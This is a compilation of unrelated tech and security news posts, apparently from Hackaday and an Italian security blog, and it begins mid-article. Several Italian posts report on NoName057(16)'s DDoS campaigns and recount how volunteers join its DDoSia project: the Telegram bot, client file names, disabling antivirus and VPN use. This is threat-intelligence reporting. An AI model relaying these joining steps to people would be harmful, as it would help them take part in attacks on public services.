The process of exchanging sodium ions in the glass with potassium ions was simple enough. The patent outlined a process for raining down a molten potassium salt solution onto the glassware, which would harden the outside surface significantly. This process was chosen for multiple reasons. It was desired to avoid immersing glassware into a huge bath of molten potassium salt, as the large bath of hot material would present safety hazards. There were also concerns that excessive time spent at high temperatures following immersion would lead to a relaxation of the crucial compressive stresses that built up in the glass from the ion exchange. Interior surfaces of the glassware could also be hardened by rotating the glasses on a horizontal axis under the “salt rain” so they were also exposed to the potassium salt to enable the ion exchange.
Recognizing the value of this patent, the Council of Ministers fast-tracked the technology into commerical production at the Sachsenglas Schwepnitz factory. The glassware was originally named CEVERIT, which was a portmanteau of the German words chemisch verfestigt—meaning “chemically solidified.” It also wore the name CV-Glas for the same reason. Production began in earnest in 1980, primarily centered around making beer glasses for hospitality businesses in East German—bars, restaurants, and the like. The glass instantly lived up to its promise, proving far more durable in commercial use. While not completely indestructible, the glasses were lasting ten to fifteen times longer than traditional commercial glassware.
Despite the political environment of the time, there were hopes to expand sales to the West. On the urging of sales representative Eberhard Pook, the glasses were referred to by the name Superfest. The aim was to avoid negative connotations of “chemicals” in the name when it came to drinking glasses. Despite efforts made at multiple trade fairs, however, international interest in the tough glassware was minimal. Speaking to ZEITMagazin in 2020, Pook noted the flat response from potential customers. “We built a wall where we stacked the glasses… Look at it, it’s unbreakable!” says Pook, translated from the original German. “No reaction.” He was told that the material’s strength was also a great weakness from a sales perspective. “At Coca Cola, for example, they said, why should we use a glass that doesn’t break, we make money with our glasses,” he explained. “The dealers understandably said, who would cut off the branch they’re sitting on?”
Production nevertheless continued apace, with 120 million glasses made for the domestic market. Hardened glassware was manufactured in all shapes and sizes, covering everything from vases to tea cups and every size of beer glass. Stock eventually began piling up at the factory, as restaurants and bars simply weren’t ordering more glassware. Their chemically-strengthened glasses were doing exactly what they were supposed to do, and replacements weren’t often necessary.
Regardless, the future was unkind to Superfest. Urban legend says that the reunification of Germany was the beginning of the end, but it’s not entirely true. As covered by ZEITMagazin, the production of Superfest glassware was ended in July 1990 because it simply wasn’t profitable for the company. Production of other glassware continued, but the chemically-hardened line was no more. The patent for the process was allowed to lapse in 1992, and pursued no more.
The question remains why we don’t have chemically-hardened glassware today. The techniques behind Superfest are scarcely different to those used in Gorilla Glass or other chemically-strengthened glasses. The manufacturing process is well-documented, and the world is full of factories that ignore any concept of intellectual property if there was even an issue to begin with. Indeed, a German crowdfunding effort even attempted to replicate the material—only to fall into insolvency this year.
It seems that either nobody can make stronger drinking glasses, or nobody wants to—perhaps because, as Superfest seemed to indicate—there simply isn’t any money in it in the long term. It’s a shame, because the world demands nice things—and that includes beer glasses that last seemingly forever.
Featured image: “Superfest glasses in five sizes” by Michael Ernst
The US just blew a hole in combatting 'hybrid warfare'
HELLO. THIS IS DIGITAL POLITICS. I'm Mark Scott, and I bring you actual scenes from my attempts to coordinate with colleagues via Microsoft's SharePoint. True story.
— The pending peace negotiations over the Ukraine-Russia war demonstrate a major failure in confronting so-called 'hybrid warfare' when politicians play directly into Kremlin narratives.
— The recent AI Action Summit in France made it clear that countries' priorities are shifting from safety to economic development.
— Fact-checking organizations represent a significant source for crowdsourced 'community notes' on social media platforms.
Let's get started:
Parametric Design Process Produces Unique Speakers
When building one-off projects, it’s common to draw up a plan on a sheet of paper or in CAD, or even wing it and hope for the best outcome without any formal plans. Each of these design philosophies has its ups and downs but both tend to be rigid, offering little flexibility as the project progresses. To solve this, designers often turn to parametric design where changes to any part of the design are automatically reflected throughout the rest, offering far greater flexibility while still maintaining an overall plan. [Cal Bryant] used this parametric method to devise a new set of speakers for an office, with excellent results.
The bulk of the speakers were designed with OpenSCAD, with the parametric design allowing for easy adjustments to accommodate different drivers and enclosure volumes. A number of the panels of the speakers are curved as well, which is more difficult with traditional speaker materials like MDF but much easier with this 3D printed design. There were a few hiccups along the way though; while the plastic used here is much denser than MDF, the amount of infill needed to be experimented with to achieve a good finish. The parametric design paid off here as well as the original didn’t fit exactly within the print bed, so without having to split up the print the speakers’ shape was slightly tweaked instead. In the end he has a finished set of speakers that look and sound like a high-end product.
There are a few other perks to a parametric design like this as well. [Cal] can take his design for smaller desk-based speakers and tweak a few dimensions and get a model designed to stand up on the floor instead. It’s a design process that adds a lot of options and although it takes a bit more up-front effort it can be worth it while prototyping or even for producing different products quickly. If you want to make something much larger than the print bed and slightly changing the design won’t cut it, [Cal] recently showed us how to easily print huge objects like arcade cabinets with fairly standard sized 3D printers.
Gli hacker filorussi di NoName057(16) aprono un canale Telegram in italiano
Nella giornata odierna, il gruppo di hacker filorussi NoName057(16) ha lanciato un nuovo canale Telegram in lingua italiana. Il canale ha già visto la pubblicazione di diversi post riguardanti notizie politiche italiane, selezionate dal gruppo come esempi di presunta ostilità nei confronti della Russia. Questa nuova iniziativa segna un’espansione della loro campagna di propaganda, puntando direttamente al pubblico italiano.
Da tempo attivi nel panorama del cyber-attivismo, NoName057(16) si è distinto per una serie di attacchi DDoS (Distributed Denial of Service) rivolti contro siti governativi, istituzionali e aziende private dei Paesi ritenuti ostili alla Russia.
L’apertura di un canale Telegram in italiano suggerisce un crescente interesse verso il nostro Paese, sia come target per attacchi informatici sia come potenziale bacino di reclutamento per il progetto DDoSia.
Chi sono gli hacktivisti filorussi di NoName057(16)?
NoName057(16) è un gruppo di hacktivisti filorussi, attivo dal marzo 2022, poco dopo l’invasione dell’Ucraina da parte della Russia. Il collettivo ha guadagnato notorietà per le sue campagne di attacchi DDoS contro infrastrutture critiche e istituzioni governative di diversi Paesi, con l’obiettivo di sabotare servizi e diffondere la loro propaganda.
I loro attacchi hanno preso di mira nazioni come Ucraina, Stati Uniti, Regno Unito, Polonia, Repubblica Ceca, Estonia e Italia, ovvero quei Paesi che hanno espresso il loro sostegno all’Ucraina nella guerra contro la Russia. NoName057(16) si autodefinisce un gruppo patriottico che difende gli interessi della Russia e combatte contro la “propaganda occidentale”.
Il manifesto di NoName057(16)
Il gruppo ha pubblicato un manifesto ideologico, disponibile su Telegram, in cui espone la propria visione del mondo e giustifica le proprie azioni. Nel testo emergono alcuni punti chiave:
- Internazionalismo – crediamo fermamente nella grandezza della Russia nell’arena internazionale. La nostra madrepatria è un baluardo di giustizia, che si ribella alle bugie e all’ipocrisia dell’Occidente collettivo. I combattenti del nostro esercito informatico possono vivere in paesi diversi, ma devono rispettare la Russia.
- Giustizia – uno dei nostri slogan è: “La giustizia non ha nome. “NoName”. Siamo pronti a venire in aiuto delle persone che la pensano come noi in qualsiasi parte del mondo e a fare ogni tentativo per ripristinare la giustizia e punire i loro trasgressori. Aiutiamo coloro che sono più deboli e impariamo da coloro che sono più forti.
- Unità – non ci importa che colore abbia la tua pelle, forma degli occhi, lingua o del luogo di residenza abbiano i nostri combattenti. Una cosa è importante: che siano persone con idee simili alle nostre e che condividano i valori tradizionali della Russia. La parola “russo” ha cessato di essere una nazionalità. “Russo” è ora un’ideologia. L’ideologia di un giusto ordine mondiale e della libertà.
Il tono del manifesto è fortemente propagandistico, con una retorica che mira a giustificare le loro azioni come una forma di resistenza contro un’ipotetica aggressione occidentale.
Il progetto DDoSia: la cyber-armata filorussa
Uno degli strumenti principali di NoName057(16) è il progetto DDoSia, un progetto che consente di coordinare attacchi DDoS su larga scala contro siti web ritenuti ostili alla Russia.
DDoSia è una piattaforma basata su reclutamento di volontari, i quali possono scaricare un software fornito dal gruppo per partecipare attivamente agli attacchi. Più un utente contribuisce agli attacchi, più guadagna in criptovalute. Questo modello di ricompensa ha permesso al gruppo di costruire una rete di cyber-mercenari che, dietro compenso, eseguono attacchi contro obiettivi selezionati.
La particolarità di DDoSia sta nel suo approccio decentralizzato: chiunque può partecipare, senza bisogno di grandi competenze informatiche. Il progetto è strutturato in modo da essere accessibile a un vasto pubblico, rendendo possibile un’ampia mobilitazione contro i bersagli indicati dal gruppo.
Un nuovo fronte della cyber propaganda
L’apertura del nuovo canale Telegram in lingua italiana rafforza l’ipotesi di un aumento della minaccia di NoName057(16) sul territorio italiano, suggerendo un tentativo di espandere la propaganda e il reclutamento in Italia.
Con il lancio di questo canale Telegram in italiano, NoName057(16) non si limita più a colpire obiettivi istituzionali tramite attacchi DDoS, ma sta cercando di influenzare direttamente l’opinione pubblica.
Diffondere contenuti in lingua locale permette loro di:
- Legittimare la loro narrativa agli occhi di un pubblico italiano, cercando di attirare simpatizzanti.
- Diffondere disinformazione su tematiche politiche e internazionali, influenzando il dibattito pubblico.
- Reclutare nuovi membri per il progetto DDoSia o per altre attività legate alla loro causa.
Negli ultimi mesi, attacchi DDoS eseguiti dai NoName hanno già preso di mira diversi siti italiani, tra cui istituzioni governative e aziende strategiche. Le autorità italiane e gli esperti di sicurezza informatica devono monitorare attentamente questi sviluppi, poiché un coinvolgimento più attivo di NoName057(16) in Italia potrebbe:
- Aumentare il numero di attacchi contro siti italiani nei prossimi mesi.
- Esporre utenti italiani a tentativi di reclutamento, soprattutto su Telegram.
- Favorire la diffusione di disinformazione all’interno dell’ecosistema digitale italiano.
NoName057(16) ha dimostrato nel tempo di essere uno dei gruppi hacktivisti filorussi più attivi e pericolosi e duraturi, con una strategia che combina attacchi informatici e propaganda digitale. L’apertura di un canale Telegram in italiano rappresenta un passo significativo nella loro espansione, indicando un interesse crescente verso il nostro Paese.
La sfida ora è capire quanto questa iniziativa possa influenzare il panorama italiano e come le istituzioni possano contrastare la loro azione, proteggendo sia le infrastrutture digitali sia il dibattito pubblico dalla loro propaganda.
L'articolo Gli hacker filorussi di NoName057(16) aprono un canale Telegram in italiano proviene da il blog della sicurezza informatica.
USB Stick Hides Large Language Model
Large language models (LLMs) are all the rage in the generative AI world these days, with the truly large ones like GPT, LLaMA, and others using tens or even hundreds of billions of parameters to churn out their text-based responses. These typically require glacier-melting amounts of computing hardware, but the “large” in “large language models” doesn’t really need to be that big for there to be a functional, useful model. LLMs designed for limited hardware or consumer-grade PCs are available now as well, but [Binh] wanted something even smaller and more portable, so he put an LLM on a USB stick.
This USB stick isn’t just a jump drive with a bit of memory on it, though. Inside the custom 3D printed case is a Raspberry Pi Zero W running llama.cpp, a lightweight, high-performance version of LLaMA. Getting it on this Pi wasn’t straightforward at all, though, as the latest version of llama.cpp is meant for ARMv8 and this particular Pi was running the ARMv6 instruction set. That meant that [Binh] needed to change the source code to remove the optimizations for the more modern ARM machines, but with a week’s worth of effort spent on it he finally got the model on the older Raspberry Pi.
Getting the model to run was just one part of this project. The rest of the build was ensuring that the LLM could run on any computer without drivers and be relatively simple to use. By setting up the USB device as a composite device which presents a filesystem to the host computer, all a user has to do to interact with the LLM is to create an empty text file with a filename, and the LLM will automatically fill the file with generated text. While it’s not blindingly fast, [Binh] believes this is the first plug-and-play USB-based LLM, and we’d have to agree. It’s not the least powerful computer to ever run an LLM, though. That honor goes to this project which is able to cram one on an ESP32.
youtube.com/embed/SM-fFsE9EDU?…
Gli Hacker di NoName057(16) Contro Sergio Mattarella: Attacchi DDoS Inondano l’Italia
Gli hacker di NoName057(16) riavviano le loro attività ostili contro diversi obiettivi italiani, attraverso attacchi di Distributed Denial-of-Service (DDoS). Questa volta la ritorsione è contro le frasi del presidente Setrgio Mattarella. Infatti gli hacktivisti riportano sul loro canale telegram il seguente commento:
Il Presidente italiano Sergio Mattarella ha paragonato la Russia al Terzo Reich, provocando una dura reazione da parte del Ministero degli Esteri russo. Mosca ha già promesso che tali dichiarazioni non resteranno senza conseguenze🤬
L'Italia riceve da noi missili DDoS verso i suoi siti web per tali paragoni del russofobo Mattarella
NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Ha rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei compresa l’Italia.
Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private. Questi sono i siti che a detta di NoName057(16) sono andati giù nella giornata di oggi.
❌Acqua Novara - servizi idrici
check-host.net/check-report/232ca8fbk19a
❌Acque Veronesi, società di gestione integrata delle acque
check-host.net/check-report/232caa84k651
❌Intesa Sanpaolo (morto al ping)
check-host.net/check-report/232cabb5k642
❌Intesa Sanpaolo S.p.A.
check-host.net/check-report/232cad71k36e
❌Intesa Sanpaolo S.p.A.
check-host.net/check-report/232caf32k392
❌Autorizzazione tramite il portale Intesa Sanpaolo
check-host.net/check-report/232cb039k5e2
❌Immobiliare Intesa Sanpaolo
check-host.net/check-report/232cb242kdd3
❌APS - Azienda di autobus di Siena
check-host.net/check-report/232cb5a6k3c9
❌ATAP - Azienda di autobus di Torino (morta al ping)
check-host.net/check-report/232cb7bfke8c
❌Malpensa - Aeroporto di Milano che serve voli internazionali e nazionali (morto su ping)
check-host.net/check-report/232cba2eka0a
Che cos’è un attacco Distributed Denial of Service
Un attacco DDoS (Distributed Denial of Service) è un tipo di attacco informatico in cui vengono inviate una grande quantità di richieste a un server o a un sito web da molte macchine diverse contemporaneamente, al fine di sovraccaricare le risorse del server e renderlo inaccessibile ai suoi utenti legittimi.
Queste richieste possono essere inviate da un grande numero di dispositivi infetti da malware e controllati da un’organizzazione criminale, da una rete di computer compromessi chiamata botnet, o da altre fonti di traffico non legittime. L’obiettivo di un attacco DDoS è spesso quello di interrompere le attività online di un’organizzazione o di un’azienda, o di costringerla a pagare un riscatto per ripristinare l’accesso ai propri servizi online.
Gli attacchi DDoS possono causare danni significativi alle attività online di un’organizzazione, inclusi tempi di inattività prolungati, perdita di dati e danni reputazionali. Per proteggersi da questi attacchi, le organizzazioni possono adottare misure di sicurezza come la limitazione del traffico di rete proveniente da fonti sospette, l’utilizzo di servizi di protezione contro gli attacchi DDoS o la progettazione di sistemi resistenti agli attacchi DDoS.
Occorre precisare che gli attacchi di tipo DDoS, seppur provocano un disservizio temporaneo ai sistemi, non hanno impatti sulla Riservatezza e Integrità dei dati, ma solo sulla loro disponibilità. pertanto una volta concluso l’attacco DDoS, il sito riprende a funzionare esattamente come prima.
Che cos’è l’hacktivismo cibernetico
L’hacktivismo cibernetico è un movimento che si serve delle tecniche di hacking informatico per promuovere un messaggio politico o sociale. Gli hacktivisti usano le loro abilità informatiche per svolgere azioni online come l’accesso non autorizzato a siti web o a reti informatiche, la diffusione di informazioni riservate o il blocco dei servizi online di una determinata organizzazione.
L’obiettivo dell’hacktivismo cibernetico è di sensibilizzare l’opinione pubblica su questioni importanti come la libertà di espressione, la privacy, la libertà di accesso all’informazione o la lotta contro la censura online. Gli hacktivisti possono appartenere a gruppi organizzati o agire individualmente, ma in entrambi i casi utilizzano le loro competenze informatiche per creare un impatto sociale e politico.
È importante sottolineare che l’hacktivismo cibernetico non deve essere confuso con il cybercrime, ovvero la pratica di utilizzare le tecniche di hacking per scopi illeciti come il furto di dati personali o finanziari. Mentre il cybercrime è illegale, l’hacktivismo cibernetico può essere considerato legittimo se mira a portare all’attenzione pubblica questioni importanti e a favorire il dibattito democratico. Tuttavia, le azioni degli hacktivisti possono avere conseguenze legali e gli hacktivisti possono essere perseguiti per le loro azioni.
Chi sono gli hacktivisti di NoName057(16)
NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private
Le informazioni sugli attacchi effettuati da NoName057(16) sono pubblicate nell’omonimo canale di messaggistica di Telegram. Secondo i media ucraini, il gruppo è anche coinvolto nell’invio di lettere di minaccia ai giornalisti ucraini. Gli hacker hanno guadagnato la loro popolarità durante una serie di massicci attacchi DDOS sui siti web lituani.
Le tecniche di attacco DDoS utilizzate dal gruppo sono miste, prediligendo la “Slow http attack”.
La tecnica del “Slow Http Attack”
L’attacco “Slow HTTP Attack” (l’articolo completo a questo link) è un tipo di attacco informatico che sfrutta una vulnerabilità dei server web. In questo tipo di attacco, l’attaccante invia molte richieste HTTP incomplete al server bersaglio, con lo scopo di tenere occupate le connessioni al server per un periodo prolungato e impedire l’accesso ai legittimi utenti del sito.
Nello specifico, l’attacco Slow HTTP sfrutta la modalità di funzionamento del protocollo HTTP, che prevede che una richiesta HTTP sia composta da tre parti: la richiesta, la risposta e il corpo del messaggio. L’attaccante invia molte richieste HTTP incomplete, in cui il corpo del messaggio viene inviato in modo molto lento o in modo incompleto, bloccando la connessione e impedendo al server di liberare le risorse necessarie per servire altre richieste.
Questo tipo di attacco è particolarmente difficile da rilevare e mitigare, poiché le richieste sembrano legittime, ma richiedono un tempo eccessivo per essere elaborate dal server. Gli attacchi Slow HTTP possono causare tempi di risposta molto lenti o tempi di inattività del server, rendendo impossibile l’accesso ai servizi online ospitati su quel sistema.
Per proteggersi da questi attacchi, le organizzazioni possono implementare soluzioni di sicurezza come l’uso di firewall applicativi (web application firewall o WAF), la limitazione delle connessioni al server e l’utilizzo di sistemi di rilevamento e mitigazione degli attacchi DDoS
L'articolo Gli Hacker di NoName057(16) Contro Sergio Mattarella: Attacchi DDoS Inondano l’Italia proviene da il blog della sicurezza informatica.
Microsoft Teams sotto attacco: Gli hacker russi rubano credenziali con falsi inviti
Il Microsoft Threat Intelligence Center (MSTIC) ha scoperto una sofisticata campagna di phishing in corso che sfrutta gli inviti di Microsoft Teams per ottenere l’accesso non autorizzato agli account utente e ai dati sensibili.
La campagna, attribuita al gruppo Storm-2372, è attiva dall’agosto 2024 e ha preso di mira un’ampia gamma di settori, tra cui governo, difesa, sanità, tecnologia ed energia in Europa, Nord America, Africa e Medio Oriente.
Il metodo di Storm-2372 si basa sul phishing del codice del dispositivo, una tecnica in cui l’autore della minaccia utilizza falsi inviti a riunioni per indurre gli utenti a fornire token di autenticazione.
Dopo aver ricevuto un invito, gli utenti ignari vengono reindirizzati a una pagina di autenticazione legittima e invitati a immettere un codice dispositivo generato dall’aggressore.
I token rubati consentono all’aggressore di accedere agli account della vittima senza richiedere una password , garantendo l’accesso a e-mail sensibili, storage cloud e altri servizi.
Una volta verificata la violazione iniziale, si osserva che Storm-2372 si sposta lateralmente all’interno delle reti compromesse inviando ulteriori e-mail di phishing dagli account delle vittime.
L’aggressore ha sfruttato anche la Graph API di Microsoft per cercare informazioni sensibili, estraendo dati utilizzando parole chiave come “password”, “admin” e “credenziali”.
Tra i recenti aggiornamenti alle tattiche del gruppo rientra l’uso dell’ID client di Microsoft Authentication Broker per registrare i dispositivi controllati dagli attori, consentendo un accesso persistente e un’ulteriore escalation.
Microsoft ha collegato Storm-2372 agli interessi dello Stato russo a causa dei suoi schemi di attacco e delle sue tecniche operative.
L'articolo Microsoft Teams sotto attacco: Gli hacker russi rubano credenziali con falsi inviti proviene da il blog della sicurezza informatica.
DDoSia: Come la Russia recluta cyber-mercenari su Telegram e li paga in criptovalute
Negli ultimi anni, il conflitto tra Russia e i suoi oppositori non si è limitato al campo di battaglia tradizionale, ma ha coinvolto sempre di più il cyberspazio. Uno dei gruppi più attivi in questa guerra informatica è NoName057(16), noto per le sue operazioni di attacco DDoS mirate a siti governativi e infrastrutture critiche di paesi ritenuti ostili alla Russia. Tra le loro iniziative, spicca DDoSia Project, una piattaforma che mobilita volontari per condurre attacchi DDoS su larga scala.
Il progetto, tuttavia, non è un semplice network di volontari: segue una struttura gerarchica, reclutando e pagando cyber-mercenari di qualsiasi livello di esperienza, senza alcuna selezione basata su competenze o background tecnico. Chiunque può partecipare, indipendentemente dalla conoscenza in ambito informatico, il che porta a un’adesione massiva di utenti inesperti che eseguono gli attacchi senza comprendere appieno i rischi legali e operativi. Questa politica di reclutamento indiscriminato trasforma DDoSia in un vero e proprio esercito digitale eterogeneo, alimentato da individui spesso ignari delle loro azioni ma che amplifica l’impatto degli attacchi.
Perché proprio queste lingue?
Un elemento interessante è la scelta delle lingue supportate dal progetto: russo, inglese, spagnolo e, sorprendentemente, italiano. Questo potrebbe indicare un’attenzione specifica a determinati paesi e comunità, suggerendo che l’Italia sia considerata un obiettivo strategico con interessi geopolitici o che vi sia un numero significativo di collaboratori italiani al suo interno.
Come funziona DDoSia Project
DDoSia è un progetto di crowdsourced DDoS, in cui chiunque può partecipare agli attacchi semplicemente registrandosi tramite Telegram e scaricando un client dedicato. Il processo è strutturato in modo da garantire un’adesione semplice ma efficace:
- Registrazione tramite il bot Telegram @Not_Realy_DDoSia_Bot con il comando /start.
- Ottenimento del Client ID, necessario per avviare gli attacchi.
- Download del client per il proprio sistema operativo.
- Configurazione e avvio del client, con il consiglio di disabilitare l’antivirus per evitare il blocco del software.
- Utilizzo di VPN per nascondere la propria identità e aumentare l’efficacia degli attacchi (non richiesto in Russia).
Distribuzione e Architettura del Client
Il client DDoSia è uno strumento che permette agli utenti di partecipare agli attacchi in modo completamente automatizzato. Il software si connette al server di comando e controllo (C2) del gruppo NoName057(16), ricevendo in tempo reale i target da colpire e gestendo il traffico dannoso in maniera distribuita.
I client sono distribuiti direttamente nei gruppi Telegram e sono disponibili, fra i tanti, per:
- Windows: `d_win_x64.exe`, `d_win_x32.exe`, `d_win_arm64.exe`
- – MacOS: `d_mac_x64`, `d_mac_arm64`
- – Linux: `d_lin_x64`, `d_lin_x32`, `d_lin_arm
- – Android: su dispositivi mobili con architettura ARM
Vettori di attacco supportati
- Flood HTTP(S): saturazione di server web con richieste GET/POST.
- UDP Flood: attacchi volumetrici contro server di gioco, VoIP e DNS.
- TCP SYN Flood: saturazione delle connessioni TCP per esaurire le risorse dei target
Il software consente ai partecipanti di inviare richieste massive a determinati obiettivi, sovraccaricandoli fino a renderli inutilizzabili. L’interfaccia è progettata per essere estremamente semplice, rendendo possibile l’uso anche a soggetti privi di competenze tecniche avanzate. Tuttavia, i partecipanti non hanno alcuna autonomia sulle decisioni: gli attacchi vengono pianificati e diretti dall’alto, e i volontari si limitano ad eseguire le istruzioni ricevute
Il sistema di ricompense, la moneta dCoin e la connessione con TON
DDoSia non si basa solo sul volontariato, ma introduce un sistema di incentivi sotto forma di una valuta elettronica chiamata dCoin. Gli utenti vengono ricompensati in base alla loro attività, e i dCoin possono essere convertiti esclusivamente in TON (Toncoin), una criptovaluta che può essere trasferita su portafogli digitali.
L’uso esclusivo di TON come valuta di conversione non è casuale: Toncoin è noto per le sue funzionalità di privacy avanzate, che lo rendono difficile da tracciare rispetto ad altre criptovalute. Questo sistema garantisce maggiore anonimato ai partecipanti e complica gli sforzi di tracciamento delle transazioni da parte delle autorità.
Il tasso di cambio attuale è di 1 dCoin = 2 rubli, con la possibilità di scambiare questi token tramite il bot Telegram @CryptoBot. Questo modello economico ha reso DDoSia particolarmente attraente per molti partecipanti, che vedono l’attività non solo come un’azione ideologica ma anche come una potenziale fonte di guadagno.
Origine delle connessioni e analisi OSInt
L’analisi delle connessioni mostra che DDoSia ha nodi attivi principalmente in Russia ed Europa dell’Est, con una presenza significativa anche in Africa occidentale e centrale. Questo suggerisce l’uso di botnet, server proxy e infrastrutture compromesse per occultare il traffico. Questi dati sono confermati tramite un modello di OSInt basato su AI, che ha analizzato i canali Telegram di Noname057 (16). Il sistema, utilizzando Telethon per lo scarping, ha permesso di monitorare parole chiave sospette, raccogliere metadati e tracciare alcune delle connessioni attive, evidenziando un’operatività distribuita su più regioni per eludere il tracciamento
Chi finanzia?
La connessione tra DDoSia e il governo russo non è mai stata esplicitamente confermata, ma diverse analisi suggeriscono una collaborazione indiretta attraverso strumenti di propaganda e finanziamenti nascosti. Altra ipotesi che confermerebbe questa connessione è data dal fatto che dalla Russia l’uso di VPN non è necessario per partecipare al programma, suggerendo una certa protezione governativa implicita per chi opera da quel territorio..Va aggiunto che la gestione delle transazioni tramite Telegram suggerisce una possibile connessione con entità più strutturate, forse riconducibili a reti di supporto governative o paramilitari. Accertamenti OSInt, oltretutto, riconducono alcuni degli utenti più attivi all’interno di chat di natura militare
Implicazioni legali e rischi per i partecipanti
Partecipare a DDoSia non è privo di rischi. Sebbene l’uso di VPN possa fornire un livello di protezione, le autorità di diversi paesi stanno aumentando i controlli per identificare e perseguire gli autori di attacchi DDoS. In molti stati, tali azioni sono considerate reati informatici punibili con pesanti sanzioni.
Inoltre, il client stesso potrebbe contenere backdoor o malware utilizzabili dai gestori del progetto per ottenere il controllo sui dispositivi degli utenti. Partecipare a queste operazioni espone quindi i volontari non solo a rischi legali, ma anche a possibili compromissioni della propria sicurezza informatica.
Va precisato che gli stessi bot di Telegram utilizzati per gestire il progetto rappresentano un ulteriore rischio per la sicurezza dei partecipanti. Essi possono infatti esplorare dati personali e attività degli utenti, raccogliendo informazioni che potrebbero essere sfruttate in altri contesti, inclusa la sorveglianza o il monitoraggio da parte delle autorità o degli stessi organizzatori del progetto
La moderazione di Telegram
La piattaforma, dopo l’arresto in Francia di Pavel Durov, ha iniziato a chiudere i canali e i gruppi legati a DDoSia, anche se non è chiaro se ciò avvenga per una reale volontà di contrasto o per semplice rispetto delle segnalazioni ricevute. Tuttavia i gruppi vengono riaperti con nuove identità in tempi molto brevi, permettendo così al progetto di continuare le proprie attività senza interruzioni significative
Conclusioni
DDoSia Project rappresenta un chiaro esempio di come la guerra informatica si stia evolvendo, trasformando utenti comuni in armi digitali. La sua struttura gerarchica e il reclutamento di cyber-mercenari indicano un livello di organizzazione più alto rispetto ad altri attacchi DDoS volontari.
Il sistema di incentivi, unito alla facilità di utilizzo, lo rende un pericolo concreto per numerose infrastrutture. Tuttavia, i rischi per i partecipanti e le contromisure disponibili suggeriscono che questa tattica, per quanto efficace nel breve termine, potrebbe incontrare crescenti ostacoli con l’evoluzione delle strategie difensive.
Nel complesso, DDoSia evidenzia la necessità per le aziende e i governi di investire in cybersecurity non solo per difendersi dagli attacchi attuali, ma per anticipare e contrastare minacce sempre più sofisticate nel futuro del cyber warfare.
La guerra digitale è in corso, e tutti abbiamo il dovere di esserne consapevoli
L'articolo DDoSia: Come la Russia recluta cyber-mercenari su Telegram e li paga in criptovalute proviene da il blog della sicurezza informatica.
DaVinci’s New Threads
Last year, we saw [How To Make Everything’s] take on [DaVinci’s] machine for cutting threads. However, they stopped short of the goal, which was making accurate metal screw threads. After much experimentation, they have a working solution. In fact, they tried several different methods, each with varying degrees of success.
Some of the more unusual methods included heating a bar red hot and twisting it, and casting a screw out of bronze. The last actually worked well with a normal screw as the mold, although presumably, a good wood or wax shape would have resulted in a workable mold, too.
The real goal, though, was to make the DaVinci machine more capable on its own. The machine uses leadscrews and can cut its own leadscrews, so, in theory, if you improve the machine, it can cut better components for itself, which may make it possible to cut even better leadscrews.
The reality was the machine required some significant rework to correctly cut metal threads. But it does, as you can see in the video below. With some additional scaling of gears, they were able to cut a 20 TPI threaded rod that would take an off-the-shelf nut.
If you missed the original post on the machine, you can still go back and read it. Of course, once you have a threaded rod, you are just a few steps away from a tap, too.
youtube.com/embed/iDiqUx6joOQ?…
Using Antimony To Make Qubits More Stable
One of the problems with quantum bits, or “qubits”, is that they tend to be rather fragile, with a high sensitivity to external influences. Much of this is due to the atoms used for qubits having two distinct spin states of up or down, along with the superposition. Any disturbing of the qubit’s state can cause it to flip between either spin, erasing the original state. Now antimony is suggested as a better qubit atom by researchers at the University of New South Wales in Australia due to it having effectively eight spin states, as also detailed in the university press release along with a very tortured ‘cats have nine lives’ analogy.
For the experiment, also published in Nature Physics, the researchers doped a silicon semiconductor with a single antimony atom, proving that such an antimony qubit device can be manufactured, with the process scalable to arrays of such qubits. For the constructed device, the spin state is controlled via a transistor constructed on top of the trapped atom. As a next step a device with closely spaced antimony atoms will be produced, which should enable these to cooperate as qubits and perform calculations.
By having the qubit go through many more states to fully flip, these qubits can potentially be much more stable than contemporary qubits. That said, there’s still a lot more research and development to be done before a quantum processor based this technology can go toe-to-toe with a Commodore 64 to show off the Quantum Processor Advantage. Very likely we’ll be seeing more of IBM’s hybrid classical-quantum systems before that.
Hackaday Links: February 16, 2025
Just when you thought the saga of the Bitcoin wallet lost in a Welsh landfill was over, another chapter of the story appears to be starting. Regular readers will recall the years-long efforts of Bitcoin early adopter James Howells to recover a hard drive tossed out by his ex back in 2013. The disk, which contains a wallet holding about 8,000 Bitcoin, is presumed to be in a landfill overseen by the city council of Newport, which denied every request by Howells to gain access to the dump. The matter looked well and truly settled (last item) once a High Court judge weighed in. But the announcement that the Newport Council plans to cap and close the landfill this fiscal year and turn part of it into a solar farm has rekindled his efforts.
Howells and his investment partners have expressed interest in buying the property as-is, in the hopes of recovering the $780 million-ish fortune. We don’t think much of their odds, especially given the consistently negative responses he’s gotten over the last twelve years. Howells apparently doesn’t fancy his odds much either, since the Council’s argument that closing the landfill to allow him to search would cause harm to the people of Newport was seemingly made while they were actively planning the closure. It sure seems like something foul is afoot, aside from the trove of dirty diapers Howells seeks to acquire, of course.
When all else fails, blame the monkey. The entire nation of Sri Lanka suffered a blackout last Sunday, with a hapless monkey being fingered as the guilty party. The outage began when a transformer at a substation south of the capital city of Colombo went offline. Unconfirmed reports are that a troop of monkeys was fighting, as monkeys do, and unadvisedly brought their tussle over the fence and into the substation yard. At some point, one of the warring animals sought the high ground on top of a transformer, with predictable results. How turning one monkey into air pollution managed to bring down an entire country’s grid is another question entirely.
From the enshittification files comes this horrifying story of in-dashboard ads. Stellantis, maker of Jeep, Dodge, Chrysler, and other brands that can reliably be counted upon to be littered with bad grounds, has decided to start putting full-screen pop-up advertisements on infotainment systems. As if that’s not atrocious enough, the ads will run not just when the car is first started, but every time the vehicle comes to a stop in traffic. The ads will hawk things like extended warranties, at least initially, but we predict it won’t be long before other upsell attempts are made. It would be pretty easy to pull in other data to customize ads, such as an offer to unlock heated seats if the outside temperature gets a little chilly, or even flog a pumpkin spice latte when the GPS shows you’re near a Starbucks. The possibilities are endless, and endlessly revolting, because if one car company does it, the rest will quickly follow. Ad-blocking wizards, this may be your next big target.
